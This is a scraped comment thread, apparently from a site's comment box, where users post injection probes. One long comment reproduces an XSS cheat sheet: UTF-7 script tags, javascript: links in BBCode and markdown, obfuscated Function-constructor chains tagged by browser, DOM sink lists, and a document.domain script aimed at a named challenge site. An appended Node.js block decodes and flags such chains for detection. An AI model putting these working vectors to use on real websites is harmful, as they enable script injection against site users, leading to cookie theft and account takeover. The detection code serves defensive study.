16 comments
2016-11-21 11:28:28 joker(joker)
test
Reply | Likes: 1
2016-09-05 21:44:40 test(test)
lengyu posted on 2015-01-12 17:30:08:
'">
testasdasdasda
Reply | Likes: 1
2016-09-05 21:44:18 test(test)
lengyu posted on 2015-01-12 17:30:08:
'">
a
Reply | Likes: 0
2016-09-05 21:43:58 test(test)
test posted on 2016-09-05 21:39:54:
aaa1234321 posted on 2015-03-22 10:42:18:
test posted on 2016-09-05 21:40:41: <a>
a
Reply | Likes: 0
2016-09-05 21:43:13 test(test)
test posted on 2016-09-05 21:39:54:
aaa1234321 posted on 2015-03-22 10:42:18:
test posted on 2016-09-05 21:40:41: <a>
clickme
Reply | Likes: 0
2016-09-05 21:41:46 test(test)
test posted on 2016-09-05 21:39:54:
aaa1234321 posted on 2015-03-22 10:42:18:
test posted on 2016-09-05 21:40:41: <a>
Whitespace substitutes (byte values accepted in place of a space):
IE, all versions: 09 0A 0C 0D 20 2F
Chrome: 09 0A 0C 0D 20 2F
Safari: 09 0A 0C 0D 20 2F
Firefox: 09 0A 0C 0D 20 2F
Opera: 09 0A 0C 0D 20 2F
Android: 09 0A 0C 0D 20 2F
Test payloads for the whitespace substitutes:
Attribute test:
Tag test:
On the question of an unclosed script still being executed ?
CLICKME CLICKME CLICKME test1 x M M M
+ADw-script+AD4-alert(123); +ADw-/script+AD4-
[url=javascript:alert(56)]xsstest[/url]
[flash]javascript:alert(57)[/flash]
[test][] [test]: javascript:alert(58)
markdown 2: [xss](\ javascript:alert(1))
Calling JS code:
$(function(){ try { $(location.hash) } catch(e) {} }) link
document.createElement(String.fromCharCode(97)).innerHTML = '';
M
''.replace('', alert);
print() find() open() --> will make it work in any ie version CLICK ME
Chrome ignores some characters
IE6-9: breaking out of the type=hidden restriction
Opera 12: breaking out of the type=hidden restriction
javascript://www.sec-t.org/search?s=%0aalert(1)
//safari opera right-click [works in Firefox] //safari hello /mobile ontouchmove untouchend also clickit
firefox/opera/chrome/safari all browser opera/chrome/firefox opera/chrome/firefox chrome/opera chrome/opera/firefox chrome/safari/opera chrome/safari/opera firefox chrome/firefox/safari chrome/opera lol
event handler and attribute testing:
tag test:
tespace = /[\x00-\x20\xA0\u1680\u180E\u2000-\u2029\u205f\u3000]/g;
In JavaScript, every backslash inside single or double quotes is ignored:
//webkit //webkit
setTimeout, setInterval, new Function and eval setImmediate execScript
[][$='\143\157\156\163\164\162\165\143\164\157\162'][$]('\141\154\145\162\164(1)')()
RuntimeObject("w*")["window"]["alert"](1); // IE
parentNode.parentNode.parentNode.parentNode['locatio'+'n']='javascrip'+'t:aler'+'t'+URL[45]+'281'+URL[45]+'29' //climb to the top with parentNode
$['__parent__']['alert'](1) //Firebug Console in FF3.6 Only
(0,[]['sort'])()['alert'](1) //FF3.6, Chrome, IE9
1.['__parent__']['alert'](1) //FF3.6
([],[]['sort'])()['alert'](1) //Chrome, FF3.6, IE9
/_/['__parent__']['alert'](1) //FF3.6
$['constructor']('alert(1)')() //JQuery Chrome, IE8, IE9, FF4, FF3.6
(0,[]['valueOf'])()['alert'](1) //Chrome, FF3.6, IE9
(0,{}['valueOf'])()['alert'](1) //Chrome, FF3.6, IE9
(0||$['valueOf'])()['alert'](1) //JQuery Chrome, IE9, FF3.6
(1&&$['valueOf'])()['alert'](1) //JQuery Chrome, IE9, FF3.6
(1?$['valueOf']:0)()['alert'](1) //Jquery Chrome, IE9
[]['sort']['apply']()['alert'](1) //Chrome, FF3.6
(0,/0/(/0/)['sort'])()['alert'](1) //Chrome, FF3.6
('',/\//['valueOf'])()['alert'](1) //Chrome, IE9, FF3.6
(1?['']['valueOf']:0)()['alert'](1) //Chrome, IE9
''['big']['constructor']('alert(1)')() //FF4, FF3.6 IE8, IE9, Webkit
[]['map']['constructor']('alert(1)')() //FF3.6, FF4, Chrome, IE9
(1&&[]['valueOf'])()['alert'](1) //Chrome, IE9, FF3.6
/_/['test']['constructor']('alert(1)')() //FF3.6, FF4, Chrome, IE8, IE9
(0||['']['valueOf'])()['alert'](1) //FF3.6, IE9, Chrome
(0.['valueOf'])['constructor']('alert(1)')() //FF3.6, FF4, IE8, IE9, Chrome
1.['constructor']['constructor']('alert(1)')() //FF3.6, FF4, IE8, IE9, Chrome
(0)['constructor']['constructor']('alert(1)')() //FF3.6, FF4, IE8, IE9, Chrome
$='@mozilla.org/js/function';$::['alert'](1) //FF3.6, FF4
http://sla.ckers.org/forum/read.php?2,130 //history of XSS
funny stuff under firefox:
raf challenge writeup2:
document.head.innerHTML=URL
document.all[0].innerHTML=URL
document.body.innerHTML=URL
document.parentNode.innerHTML
document.parentElement.innerHTML
document.childNodes
document.childrens
defaultView.document.body
Script.document.body.innerHTML //IE only
content.document.body.innerHTML //FF Only
id=a onerror=a.ownerDocument.body.innerHTML //IE,Firefox
d=attributes.src;d,ownerElement.innerHTML
previousSibling.ownerDocument.body.innerHTML
event.target.innerHTML
arguments[0].target.innerHTML
arguments[0].path[0].innerHTML
event.srcElement.innerHTML
event.path[0].innerHTML
onerror.arguments[0].target
_=new Option;_.innerHTML
[new Audio][0]['ownerDocument']
[new Text][0]['ownerDocument']
[new Range][0]['commonAncestorContainer']
[new Range][0]['endContainer']
[new Range][0]['startContainer']
[new Option][0]['ownerDocument']
[new Option][0]['lastChild']
[new Option][0]['firstChild']
[new Image][0]['ownerDocument']
[new DocumentFragment][0]['ownerDocument']
[new Comment][0]['ownerDocument']
onload=a.innerHTML=URL
onerror=a={};a[src="logo.png"]=a=activeElement
_=new Text;_.ownerDocument.body.innerHTML
event.fromElement.innerHTML
vbs:setTimeout "setTimeout wind"&"w.nam"&"e" //window.name=javascript:alert(1)
event.target.parentElement.innerHTML
v=[onerror+''][0];attributes[1].value='aler'+'t'+v[16]+1+v[22];src=2 //chrome this is crazy
safari document.domain='com' trick
function go(){
  document.domain='com';
  var w=window.open("https://challenges.prakharprasad.com/xss/2/xss.php?xss=%27x%27onerror=domain=%27com%27","x");
  var si=setInterval(function(){
    if(w.document.location.host=='challenges.prakharprasad.com'){ w.alert(1); clearInterval(si); }
  },1)
}
go
'._=document.domain='
Sending valid JSON with HTML form:
Funny IE VECTOR(
Reply | Likes: 0
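The Function-constructor chains and string-escape tricks in the comment above, decoded and executed under Node.js. This is an added example and not part of the original comment or of the cheat sheet it reproduces: the sample payloads are copied from the comment (constructed input for this example), `alert(1)` is swapped for a `return` so the chain can run outside a browser, and `normalize` / `reachesFunctionCtor` are a hypothetical normaliser written here to show why octal escapes, `String.fromCharCode` and the `[][$='constructor'][$]` alias have to be folded before any signature on the word `constructor` can work.

```javascript
// Added example (not from the original comment): decode the obfuscated
// Function-constructor payloads quoted above and run them under Node.js.

// Whitespace class copied from the "tespace" regex in the comment above.
const JS_SPACE = /[\x00-\x20\xA0\u1680\u180E\u2000-\u2029\u205f\u3000]/g;

// Decode the escapes a JavaScript string literal would decode: octal (\143),
// hex (\x61), unicode (\u0061, \u{61}), the usual control escapes, and the
// "unknown escape" case where the backslash is simply dropped ('\a' === 'a').
function decodeJsEscapes(s) {
  const control = { n: '\n', t: '\t', r: '\r', b: '\b', f: '\f', v: '\v' };
  return s.replace(
    /\\(x[0-9a-fA-F]{2}|u\{[0-9a-fA-F]+\}|u[0-9a-fA-F]{4}|[0-7]{1,3}|[\s\S])/g,
    (_, esc) => {
      if (/^[0-7]+$/.test(esc)) return String.fromCharCode(parseInt(esc, 8));
      if (esc.length === 1) return esc in control ? control[esc] : esc; // backslash dropped
      if (esc[0] === 'x') return String.fromCharCode(parseInt(esc.slice(1), 16));
      return String.fromCodePoint(parseInt(esc.replace(/[u{}]/g, ''), 16)); // \uXXXX, \u{X}
    });
}

// Fold String.fromCharCode(97, 108, ...) into the literal it builds.
function foldFromCharCode(s) {
  return s.replace(/String\.fromCharCode\(\s*([\d\s,]+)\)/g, (_, args) =>
    String.fromCharCode(...args.split(',').map((a) => parseInt(a, 10))));
}

// Canonical form of a payload: decode escapes, fold fromCharCode, strip every
// character the whitespace class accepts, and resolve the self-assigning alias
// [][$='constructor'][$] used in the comment (hypothetical normaliser).
function normalize(payload) {
  return foldFromCharCode(decodeJsEscapes(payload))
    .replace(JS_SPACE, '')
    .replace(/\[([\w$]+)=(['"])constructor\2\]\[\1\]/g, "['constructor']['constructor']");
}

// After normalisation every chain in the comment ends in
// ...['constructor']('<source>') or ...constructor('<source>'):
// the Function constructor called with a string of source code.
const CTOR_CALL = /(\[['"]constructor['"]\]|\.constructor)\(['"]/;

function reachesFunctionCtor(payload) {
  return CTOR_CALL.test(normalize(payload));
}

// The chain itself, executed: [][c][c] is Array.constructor, i.e. Function.
// alert(1) is replaced by a return value so this works outside a browser.
function viaArrayCtorChain(body) {
  const c = decodeJsEscapes('\\143\\157\\156\\163\\164\\162\\165\\143\\164\\157\\162'); // "constructor"
  return [][c][c](body)();
}

// Payloads copied from the comment above (constructed sample input).
const SAMPLES = [
  "[][$='\\143\\157\\156\\163\\164\\162\\165\\143\\164\\157\\162'][$]('\\141\\154\\145\\162\\164(1)')()",
  "''['big']['constructor']('alert(1)')()",
  "(0)['constructor']['constructor']('alert(1)')()",
  "$['constructor']('alert(1)')() //JQuery",
  "document.createElement(String.fromCharCode(97)).innerHTML = ''",
  "$(function(){ try { $(location.hash) } catch(e) {} })",
];

for (const p of SAMPLES) {
  console.log(reachesFunctionCtor(p) ? 'FUNCTION-CTOR' : 'other        ', normalize(p));
}
console.log('[][c][c]("return 6*7")() =>', viaArrayCtorChain('return 6*7'));
```

The last two samples (a `createElement` sink and the jQuery `$(location.hash)` selector sink from the same comment) are left unflagged on purpose: they are DOM sinks rather than code-constructor chains, and a rule keyed on `constructor` should not match them.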
2016-09-05 21:40:41 test(test)
test posted on 2016-09-05 21:39:54:
aaa1234321 posted on 2015-03-22 10:42:18:
<a>
Reply | Likes: 1
2016-09-05 21:39:54 test(test)
aaa1234321 posted on 2015-03-22 10:42:18:
Reply | Likes: 0
2016-09-05 21:38:49 test(test)
testme
Reply | Likes: 0
2016-09-05 21:38:07 test(test)
aaa1234321 posted on 2015-03-22 10:42:18: dddd123456 Reply Likes(5)
Reply | Likes: 0
2016-09-05 21:37:29 test(test)
atag test: z
Reply | Likes: 0
2016-09-05 21:32:57 test(test)
\'\"a\\
回复 支持0
2016-03-14 17:12:56 demozx(demozx)
www.kejitianxia.com
Reply | Likes: 2
2015-08-04 09:44:10 Anny_123456(njy123456)
aaa1234321 posted on 2015-03-22 10:42:18:
dddd
123456
Reply | Likes: 5
2015-03-22 10:42:18 111234ff(aaa1234321)
dddd
Reply | Likes: 12
2015-01-12 17:30:08 awfad(lengyu)
">
'">
Reply | Likes: 8